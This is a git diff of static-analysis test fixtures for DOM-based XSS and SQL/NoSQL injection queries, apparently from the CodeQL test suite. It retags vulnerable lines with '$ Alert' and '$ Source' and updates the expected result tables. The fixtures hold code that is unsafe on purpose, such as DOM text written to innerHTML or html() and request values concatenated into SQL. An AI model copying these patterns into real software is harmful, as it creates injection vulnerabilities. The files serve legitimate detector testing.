$("textarea").val() | xss-through-dom.js:155:27:155:29 | msg | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:159:34:159:52 | $("textarea").val() | DOM text | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref index 3226decda378..30db379de212 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref @@ -1 +1,2 @@ -Security/CWE-079/XssThroughDom.ql +query: Security/CWE-079/XssThroughDom.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index 15207cb5059c..084950e8e08e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -9,28 +9,28 @@ import { NgForm } from "@angular/forms"; ` }) export class Foo { - field: string = ""; + field: string = ""; // $ Source safeField: string = ""; setInput1(event) { - document.write(event.target.value); // NOT OK + document.write(event.target.value); // $ Alert } setInput2(target) { - document.write(target.value); // NOT OK + document.write(target.value); // $ Alert } setOtherInput(e) { - document.write(e.target.value); // OK - document.write(e.value); // OK + document.write(e.target.value); + document.write(e.value); } blah(form: NgForm) { - document.write(form.value.foo); // NOT OK + document.write(form.value.foo); // $ Alert } useField() { - document.write(this.field); // NOT OK - document.write(this.safeField); // OK + document.write(this.field); // $ Alert + document.write(this.safeField); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index b91b7490bb2d..e57ef84dc429 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -5,11 +5,11 @@ const FormikBasic = () => (
    { - $("#id").html(values.foo); // NOT OK + validate={values => { // $ Source + $("#id").html(values.foo); // $ Alert }} - onSubmit={(values, { setSubmitting }) => { - $("#id").html(values.bar); // NOT OK + onSubmit={(values, { setSubmitting }) => { // $ Source + $("#id").html(values.bar); // $ Alert }} > {(inputs) => ( @@ -21,28 +21,28 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), - validate: values => { - $("#id").html(values.email); // NOT OK + validate: values => { // $ Source + $("#id").html(values.email); // $ Alert }, - handleSubmit: (values, { setSubmitting }) => { - $("#id").html(values.email); // NOT OK + handleSubmit: (values, { setSubmitting }) => { // $ Source + $("#id").html(values.email); // $ Alert } })(MyForm); (function () { - const { values, submitForm } = useFormikContext(); - $("#id").html(values.email); // NOT OK + const { values, submitForm } = useFormikContext(); // $ Source + $("#id").html(values.email); // $ Alert - $("#id").html(submitForm.email); // OK + $("#id").html(submitForm.email); }) import { Form } from 'react-final-form' const App = () => (
    { - $("#id").html(values.stooge); // NOT OK + onSubmit={async values => { // $ Source + $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} render={({ handleSubmit, form, submitting, pristine, values }) => ( @@ -54,7 +54,7 @@ const App = () => ( ); function plainSubmit(e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } const plainReact = () => ( @@ -68,8 +68,8 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook - const onSubmit = (data) => { - $("#id").html(data.name); // NOT OK + const onSubmit = (data) => { // $ Source + $("#id").html(data.name); // $ Alert }; return ( @@ -89,8 +89,8 @@ function HookForm2() { @@ -100,10 +100,10 @@ function HookForm2() { function vanillaJS() { document.querySelector("form.myform").addEventListener("submit", e => { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert }); document.querySelector("form.myform").onsubmit = function (e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js index 354194a597d9..8082f8ef0ab9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js @@ -1,35 +1,35 @@ (function () { - $("#id").html($("textarea").val()); // NOT OK. + $("#id").html($("textarea").val()); // $ Alert - $("#id").html($(".some-element").text()); // NOT OK. + $("#id").html($(".some-element").text()); // $ Alert - $("#id").html($(".some-element").attr("foo", "bar")); // OK. - $("#id").html($(".some-element").attr({"foo": "bar"})); // OK. - $("#id").html($(".some-element").attr("data-target")); // NOT OK. + $("#id").html($(".some-element").attr("foo", "bar")); + $("#id").html($(".some-element").attr({"foo": "bar"})); + $("#id").html($(".some-element").attr("data-target")); // $ Alert $("#id").html( - document.getElementById("foo").innerText // NOT OK. + document.getElementById("foo").innerText // $ Alert ); $("#id").html( - document.getElementById("foo").innerHTML // OK - only repeats existing XSS. + document.getElementById("foo").innerHTML // OK - only repeats existing XSS. ); $("#id").html( - document.getElementById("foo").textContent // NOT OK. + document.getElementById("foo").textContent // $ Alert ); $("#id").html( - document.querySelectorAll("textarea")[0].value // NOT OK. + document.querySelectorAll("textarea")[0].value // $ Alert ); $("#id").html( - document.getElementById('div1').getAttribute('data-target') // NOT OK + document.getElementById('div1').getAttribute('data-target') // $ Alert ); function safe1(x) { // overloaded function. if (x.jquery) { - var foo = $(x); // OK + var foo = $(x); } } @@ -37,7 +37,7 @@ function safe2(x) { // overloaded function. if (typeof x === "object") { - var foo = $(x); // OK + var foo = $(x); } } safe2($("textarea").val()); @@ -48,52 +48,52 @@ ); - $("#id").get(0).innerHTML = $("textarea").val(); // NOT OK. + $("#id").get(0).innerHTML = $("textarea").val(); // $ Alert var base = $("#id"); - base[html ? 'html' : 'text']($("textarea").val()); // NOT OK. + base[html ? 'html' : 'text']($("textarea").val()); // $ Alert - $("#id").get(0).innerHTML = $("input").get(0).name; // NOT OK. - $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // NOT OK. + $("#id").get(0).innerHTML = $("input").get(0).name; // $ Alert + $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // $ Alert - $("#id").get(0).innerHTML = $("input").getAttribute("id"); // OK. + $("#id").get(0).innerHTML = $("input").getAttribute("id"); - $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // NOT OK. + $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // $ Alert var valMethod = $("textarea").val; - $("#id").get(0).innerHTML = valMethod(); // NOT OK + $("#id").get(0).innerHTML = valMethod(); // $ Alert var myValue = $(document).find("option").attr("value"); if(myValue.property) { - $("#id").get(0).innerHTML = myValue; // OK. + $("#id").get(0).innerHTML = myValue; } - $.jGrowl($("input").get(0).name); // NOT OK. + $.jGrowl($("input").get(0).name); // $ Alert - let selector = $("input").get(0).name; + let selector = $("input").get(0).name; // $ Source if (something()) { selector = $("textarea").val || '' } - $(selector); // NOT OK + $(selector); // $ Alert - $(document.my_form.my_input.value); // NOT OK + $(document.my_form.my_input.value); // $ Alert - $("#id").html( $('#foo').prop('innerText') ); // NOT OK + $("#id").html( $('#foo').prop('innerText') ); // $ Alert const anser = require("anser"); - const text = $("text").text(); + const text = $("text").text(); // $ Source - $("#id").html(anser.ansiToHtml(text)); // NOT OK - $("#id").html(new anser().process(text)); // NOT OK + $("#id").html(anser.ansiToHtml(text)); // $ Alert + $("#id").html(new anser().process(text)); // $ Alert $("section h1").each(function(){ - $("nav ul").append("Section"); // OK + $("nav ul").append("Section"); }); - $("#id").html($("#foo").find(".bla")[0].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[0].value); // $ Alert for (var i = 0; i < foo.length; i++) { - $("#id").html($("#foo").find(".bla")[i].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[i].value); // $ Alert } })(); @@ -106,20 +106,20 @@ class Super { class Sub extends Super { constructor() { super(); - $("#id").get(0).innerHTML = "foo"; // NOT OK. Attack: `` + $("#id").get(0).innerHTML = "foo"; // $ Alert - Attack: `` } } (function () { - const src = document.getElementById("#link").src; - $("#id").html(src); // NOT OK. + const src = document.getElementById("#link").src; // $ Source + $("#id").html(src); // $ Alert - $("#id").attr("src", src); // OK + $("#id").attr("src", src); $("input.foo")[0].onchange = function (ev) { - $("#id").html(ev.target.files[0].name); // NOT OK. + $("#id").html(ev.target.files[0].name); // $ Alert - $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // NOT OK + $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // $ Alert } })(); @@ -127,36 +127,36 @@ class Sub extends Super { let elem = document.createElement('a'); const wSelection = getSelection(); const dSelection = document.getSelection(); - let linkText = wSelection.toString() || dSelection.toString() || ''; - elem.innerHTML = linkText; // NOT OK - $("#id").html(linkText); // NOT OK - elem.innerText = linkText; // OK + let linkText = wSelection.toString() || dSelection.toString() || ''; // $ Source + elem.innerHTML = linkText; // $ Alert + $("#id").html(linkText); // $ Alert + elem.innerText = linkText; })(); const cashDom = require("cash-dom"); (function () { - const src = document.getElementById("#link").src; - cash("#id").html(src); // NOT OK. - cashDom("#id").html(src); // NOT OK + const src = document.getElementById("#link").src; // $ Source + cash("#id").html(src); // $ Alert + cashDom("#id").html(src); // $ Alert var DOMPurify = { sanitize: function (src) { return src; // to model spuriously finding an edge. The below is still OK. } }; - cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); // OK + cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); - $("", { html: src }).appendTo("#id"); // NOT OK + $("", { html: src }).appendTo("#id"); // $ Alert function foo() { window.VeryUniqueXssTestName = { send: function (msg) { - $("#id").html(msg); // NOT OK + $("#id").html(msg); // $ Alert }, }; - VeryUniqueXssTestName.send($("textarea").val()); + VeryUniqueXssTestName.send($("textarea").val()); // $ Source } foo() })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected index 3a4a7ef0481c..b6710ee92f5a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected @@ -1,12 +1,12 @@ +#select +| test.js:7:14:7:61 | 'SELECT ... + temp | test.js:4:12:4:22 | process.env | test.js:7:14:7:61 | 'SELECT ... + temp | This query string depends on a $@. | test.js:4:12:4:22 | process.env | user-provided value | +edges +| test.js:4:5:4:29 | temp | test.js:7:58:7:61 | temp | provenance | | +| test.js:4:12:4:22 | process.env | test.js:4:5:4:29 | temp | provenance | | +| test.js:7:58:7:61 | temp | test.js:7:14:7:61 | 'SELECT ... + temp | provenance | | nodes | test.js:4:5:4:29 | temp | semmle.label | temp | | test.js:4:12:4:22 | process.env | semmle.label | process.env | | test.js:7:14:7:61 | 'SELECT ... + temp | semmle.label | 'SELECT ... + temp | | test.js:7:58:7:61 | temp | semmle.label | temp | -edges -| test.js:4:5:4:29 | temp | test.js:7:58:7:61 | temp | provenance | | -| test.js:4:12:4:22 | process.env | test.js:4:5:4:29 | temp | provenance | | -| test.js:7:58:7:61 | temp | test.js:7:14:7:61 | 'SELECT ... + temp | provenance | | subpaths -#select -| test.js:7:14:7:61 | 'SELECT ... + temp | test.js:4:12:4:22 | process.env | test.js:7:14:7:61 | 'SELECT ... + temp | This query string depends on a $@. | test.js:4:12:4:22 | process.env | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js index 42b11b27b6eb..517a492e656b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js @@ -1,9 +1,9 @@ const mysql = require('mysql'); const pool = mysql.createPool(getConfig()); -let temp = process.env['foo']; +let temp = process.env['foo']; // $ Source pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected index 5446a4da85a5..b0ae2737b003 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected @@ -1,3 +1,20 @@ +#select +| typedClient.ts:14:24:14:32 | { id: v } | typedClient.ts:13:22:13:29 | req.body | typedClient.ts:14:24:14:32 | { id: v } | This query object depends on a $@. | typedClient.ts:13:22:13:29 | req.body | user-provided value | +| typedClient.ts:22:27:22:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:22:27:22:35 | { id: v } | This query object depends on a $@. | typedClient.ts:21:22:21:29 | req.body | user-provided value | +| typedClient.ts:23:27:23:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:23:27:23:35 | { id: v } | This query object depends on a $@. | typedClient.ts:21:22:21:29 | req.body | user-provided value | +edges +| typedClient.ts:13:7:13:32 | v | typedClient.ts:14:30:14:30 | v | provenance | | +| typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | typedClient.ts:13:7:13:32 | v | provenance | | +| typedClient.ts:13:22:13:29 | req.body | typedClient.ts:13:22:13:31 | req.body.x | provenance | Config | +| typedClient.ts:13:22:13:31 | req.body.x | typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | provenance | Config | +| typedClient.ts:14:30:14:30 | v | typedClient.ts:14:24:14:32 | { id: v } | provenance | Config | +| typedClient.ts:21:7:21:32 | v | typedClient.ts:22:33:22:33 | v | provenance | | +| typedClient.ts:21:7:21:32 | v | typedClient.ts:23:33:23:33 | v | provenance | | +| typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | typedClient.ts:21:7:21:32 | v | provenance | | +| typedClient.ts:21:22:21:29 | req.body | typedClient.ts:21:22:21:31 | req.body.x | provenance | Config | +| typedClient.ts:21:22:21:31 | req.body.x | typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | provenance | Config | +| typedClient.ts:22:33:22:33 | v | typedClient.ts:22:27:22:35 | { id: v } | provenance | Config | +| typedClient.ts:23:33:23:33 | v | typedClient.ts:23:27:23:35 | { id: v } | provenance | Config | nodes | typedClient.ts:13:7:13:32 | v | semmle.label | v | | typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | semmle.label | JSON.pa ... body.x) | @@ -13,21 +30,4 @@ nodes | typedClient.ts:22:33:22:33 | v | semmle.label | v | | typedClient.ts:23:27:23:35 | { id: v } | semmle.label | { id: v } | | typedClient.ts:23:33:23:33 | v | semmle.label | v | -edges -| typedClient.ts:13:7:13:32 | v | typedClient.ts:14:30:14:30 | v | provenance | | -| typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | typedClient.ts:13:7:13:32 | v | provenance | | -| typedClient.ts:13:22:13:29 | req.body | typedClient.ts:13:22:13:31 | req.body.x | provenance | Config | -| typedClient.ts:13:22:13:31 | req.body.x | typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | provenance | Config | -| typedClient.ts:14:30:14:30 | v | typedClient.ts:14:24:14:32 | { id: v } | provenance | Config | -| typedClient.ts:21:7:21:32 | v | typedClient.ts:22:33:22:33 | v | provenance | | -| typedClient.ts:21:7:21:32 | v | typedClient.ts:23:33:23:33 | v | provenance | | -| typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | typedClient.ts:21:7:21:32 | v | provenance | | -| typedClient.ts:21:22:21:29 | req.body | typedClient.ts:21:22:21:31 | req.body.x | provenance | Config | -| typedClient.ts:21:22:21:31 | req.body.x | typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | provenance | Config | -| typedClient.ts:22:33:22:33 | v | typedClient.ts:22:27:22:35 | { id: v } | provenance | Config | -| typedClient.ts:23:33:23:33 | v | typedClient.ts:23:27:23:35 | { id: v } | provenance | Config | subpaths -#select -| typedClient.ts:14:24:14:32 | { id: v } | typedClient.ts:13:22:13:29 | req.body | typedClient.ts:14:24:14:32 | { id: v } | This query object depends on a $@. | typedClient.ts:13:22:13:29 | req.body | user-provided value | -| typedClient.ts:22:27:22:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:22:27:22:35 | { id: v } | This query object depends on a $@. | typedClient.ts:21:22:21:29 | req.body | user-provided value | -| typedClient.ts:23:27:23:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:23:27:23:35 | { id: v } | This query object depends on a $@. | typedClient.ts:21:22:21:29 | req.body | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts index 5741f61fad64..4efc810a6a32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts @@ -10,15 +10,15 @@ let app = express(); app.use(bodyParser.json()); app.post("/find", (req, res) => { - let v = JSON.parse(req.body.x); - getCollection().find({ id: v }); // NOT OK + let v = JSON.parse(req.body.x); // $ Source + getCollection().find({ id: v }); // $ Alert }); import * as mongoose from "mongoose"; declare function getMongooseModel(): mongoose.Model; declare function getMongooseQuery(): mongoose.Query; app.post("/find", (req, res) => { - let v = JSON.parse(req.body.x); - getMongooseModel().find({ id: v }); // NOT OK - getMongooseQuery().find({ id: v }); // NOT OK + let v = JSON.parse(req.body.x); // $ Source + getMongooseModel().find({ id: v }); // $ Alert + getMongooseQuery().find({ id: v }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql deleted file mode 100644 index 9c721994d677..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql +++ /dev/null @@ -1,4 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.SqlInjectionQuery as SqlInjection -import semmle.javascript.security.dataflow.NosqlInjectionQuery as NosqlInjection diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected index 0f95e5464fb9..52ce3076ba70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected @@ -1,4 +1,4 @@ -| html-sanitizer.js:15:5:17:5 | connect ... K\\n ) | +| html-sanitizer.js:15:5:17:5 | connect ... t\\n ) | | json-schema-validator.js:27:13:27:27 | doc.find(query) | | json-schema-validator.js:30:13:30:27 | doc.find(query) | | json-schema-validator.js:33:13:33:27 | doc.find(query) | @@ -7,43 +7,43 @@ | json-schema-validator.js:55:13:55:27 | doc.find(query) | | json-schema-validator.js:59:13:59:27 | doc.find(query) | | json-schema-validator.js:61:13:61:27 | doc.find(query) | -| marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | -| marsdb.js:16:3:16:36 | doc.fin ... => {}) | -| minimongo.js:18:3:18:17 | doc.find(query) | -| mongodb.js:18:7:18:21 | doc.find(query) | -| mongodb.js:21:7:21:48 | doc.fin ... itle }) | -| mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | -| mongodb.js:29:9:29:34 | doc.fin ... itle }) | -| mongodb.js:32:9:32:46 | doc.fin ... tle) }) | -| mongodb.js:43:7:43:21 | doc.find(query) | -| mongodb.js:54:7:54:21 | doc.find(query) | -| mongodb.js:65:3:65:17 | doc.find(query) | -| mongodb.js:73:5:77:27 | client\\n ... tag }) | -| mongodb.js:81:3:85:25 | importe ... tag }) | -| mongodb.js:98:5:98:19 | doc.find(query) | -| mongodb.js:112:5:112:19 | doc.find(query) | +| marsdb-flow-to.js:13:3:13:41 | db.myDo ... => {}) | +| marsdb.js:15:3:15:36 | doc.fin ... => {}) | +| minimongo.js:17:3:17:17 | doc.find(query) | +| mongodb.js:17:7:17:21 | doc.find(query) | +| mongodb.js:20:7:20:48 | doc.fin ... itle }) | +| mongodb.js:23:7:23:53 | doc.fin ... r(1) }) | +| mongodb.js:28:9:28:34 | doc.fin ... itle }) | +| mongodb.js:30:9:30:46 | doc.fin ... tle) }) | +| mongodb.js:41:7:41:21 | doc.find(query) | +| mongodb.js:51:7:51:21 | doc.find(query) | +| mongodb.js:61:3:61:17 | doc.find(query) | +| mongodb.js:69:5:72:27 | client\\n ... tag }) | +| mongodb.js:76:3:79:25 | importe ... tag }) | +| mongodb.js:92:5:92:19 | doc.find(query) | +| mongodb.js:105:5:105:19 | doc.find(query) | | mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | -| mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | -| mongoose.js:63:2:63:34 | Documen ... then(X) | -| mongoose.js:65:2:65:51 | Documen ... on(){}) | -| mongoose.js:67:2:68:27 | new Mon ... on(){}) | -| mongoose.js:71:2:78:9 | Documen ... .exec() | -| mongoose.js:85:2:85:52 | Documen ... query)) | -| mongoose.js:86:2:86:52 | Documen ... query)) | -| mongoose.js:87:2:87:57 | Documen ... query)) | -| mongoose.js:88:2:88:57 | Documen ... query)) | -| mongoose.js:89:2:89:52 | Documen ... query)) | -| mongoose.js:90:2:90:55 | Documen ... query)) | -| mongoose.js:92:2:92:52 | Documen ... query)) | -| mongoose.js:93:2:93:49 | Documen ... query)) | -| mongoose.js:94:2:94:57 | Documen ... query)) | -| mongoose.js:95:2:95:54 | Documen ... query)) | -| mongoose.js:96:2:96:52 | Documen ... query)) | -| mongoose.js:97:2:97:52 | Documen ... query)) | -| mongoose.js:99:2:99:50 | Documen ... query)) | -| mongoose.js:113:2:113:53 | Documen ... () { }) | -| mongoose.js:134:3:134:52 | Documen ... on(){}) | -| mongoose.js:136:3:136:52 | Documen ... on(){}) | +| mongodb_bodySafe.js:28:7:28:21 | doc.find(query) | +| mongoose.js:49:2:49:34 | Documen ... then(X) | +| mongoose.js:51:2:51:51 | Documen ... on(){}) | +| mongoose.js:53:2:54:27 | new Mon ... on(){}) | +| mongoose.js:57:2:64:9 | Documen ... .exec() | +| mongoose.js:71:2:71:52 | Documen ... query)) | +| mongoose.js:72:2:72:52 | Documen ... query)) | +| mongoose.js:73:2:73:57 | Documen ... query)) | +| mongoose.js:74:2:74:57 | Documen ... query)) | +| mongoose.js:75:2:75:52 | Documen ... query)) | +| mongoose.js:76:2:76:55 | Documen ... query)) | +| mongoose.js:78:2:78:52 | Documen ... query)) | +| mongoose.js:79:2:79:49 | Documen ... query)) | +| mongoose.js:80:2:80:57 | Documen ... query)) | +| mongoose.js:81:2:81:54 | Documen ... query)) | +| mongoose.js:82:2:82:52 | Documen ... query)) | +| mongoose.js:83:2:83:52 | Documen ... query)) | +| mongoose.js:85:2:85:50 | Documen ... query)) | +| mongoose.js:99:2:99:53 | Documen ... () { }) | +| mongoose.js:120:3:120:52 | Documen ... on(){}) | +| mongoose.js:122:3:122:52 | Documen ... on(){}) | | mysql.js:8:9:11:47 | connect ... ds) {}) | | mysql.js:14:9:16:47 | connect ... ds) {}) | | mysql.js:19:9:20:48 | connect ... ds) {}) | @@ -59,10 +59,10 @@ | pg-promise.js:17:3:17:21 | db.oneOrNone(query) | | pg-promise.js:18:3:18:17 | db.query(query) | | pg-promise.js:19:3:19:18 | db.result(query) | -| pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | -| pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | +| pg-promise.js:21:3:23:4 | db.one( ... rt\\n }) | +| pg-promise.js:24:3:27:4 | db.one( ... d,\\n }) | | pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | -| pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | +| pg-promise.js:32:3:35:4 | db.one( ... rt\\n }) | | pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | | pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | | pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | @@ -88,7 +88,7 @@ | redis.js:49:18:49:47 | client. ... value") | | socketio.js:11:5:11:54 | db.run( ... ndle}`) | | tst2.js:7:3:7:62 | sql.que ... ms.id}` | -| tst2.js:9:3:9:85 | new sql ... + "'") | +| tst2.js:8:3:8:85 | new sql ... + "'") | | tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | | tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | | tst4.js:8:3:8:67 | db.get( ... + '"') | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected index 5ae279288cf8..7ac39529dd60 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected @@ -1,38 +1,509 @@ +#select +| graphql.js:9:34:19:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:9:34:19:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | +| graphql.js:26:30:26:40 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:26:30:26:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:29:32:29:42 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:29:32:29:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:32:18:32:28 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:32:18:32:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:43:14:43:24 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:43:14:43:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:47:44:47:54 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:47:44:47:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:55:39:55:49 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:55:39:55:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:57:66:57:76 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:57:66:57:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | graphql.js:73:14:73:25 | req.query.id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:82:14:88:8 | `{\\n ... }` | graphql.js:73:14:73:25 | req.query.id | graphql.js:82:14:88:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:118:38:118:48 | `foo ${id}` | graphql.js:117:16:117:28 | req.params.id | graphql.js:118:38:118:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:117:16:117:28 | req.params.id | user-provided value | +| html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | +| json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | +| json-schema-validator.js:35:18:35:22 